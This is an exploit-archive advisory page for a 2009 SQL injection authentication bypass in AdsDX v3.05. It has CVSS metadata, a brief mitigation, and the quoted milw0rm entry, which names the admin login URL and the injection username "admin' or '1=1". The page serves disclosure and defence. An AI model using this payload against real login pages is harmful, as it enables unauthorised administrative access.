AdsDX v3.05 (Auth Bypass) Remote Sql Injection

vendor:

AdsDX

by:

Snakespc

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: AdsDX

Affected Version From: 03.05

Affected Version To: 03.05

Patch Exists: N/A

Related CWE: N/A

CPE: a:adsdx:adsdx:3.05

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

AdsDX v3.05 (Auth Bypass) Remote Sql Injection

AdsDX v3.05 is vulnerable to a remote SQL injection vulnerability. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable application. This can allow the attacker to bypass authentication and gain access to the application.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in SQL queries.

Source

Exploit-DB raw data:

#--------------------------------------------------------
#AdsDX v3.05 (Auth Bypass) Remote Sql Injection
#--------------------------------------------------------
#Discovered By: Snakespc     ALGERIAN HaCkEr 
#Mail: snakespc@gmail.com       
#-------------------------------------------------------
#
#Script:AdsDX v3.05
#
#http://www.adsdx.com
#--------------------------------------------------------
#Exploit:
#--------
#Demo:http://adsdx.com/demo/admin/index.php
#Username:admin' or '1=1 
#Password: No Thing !!!!
#-------------------------SNAKES TEAM-------------------------------
# Akram:::Mr.HCOCA_MAN:::DrEaDFuL:::yassine_enp:::His0k4 --->Tous les AlgÃ©riens
#--------------------------SNAKES TEAM------------------------------
#Str0ke >>>>>>>Milw0rm
Note:His0k4 Saha Al Zalabiaaaaa Wa Saha elchribaaa .....RANI TWAHCHTEK BZAFFFFFFFFFFFF 

# milw0rm.com [2009-09-16]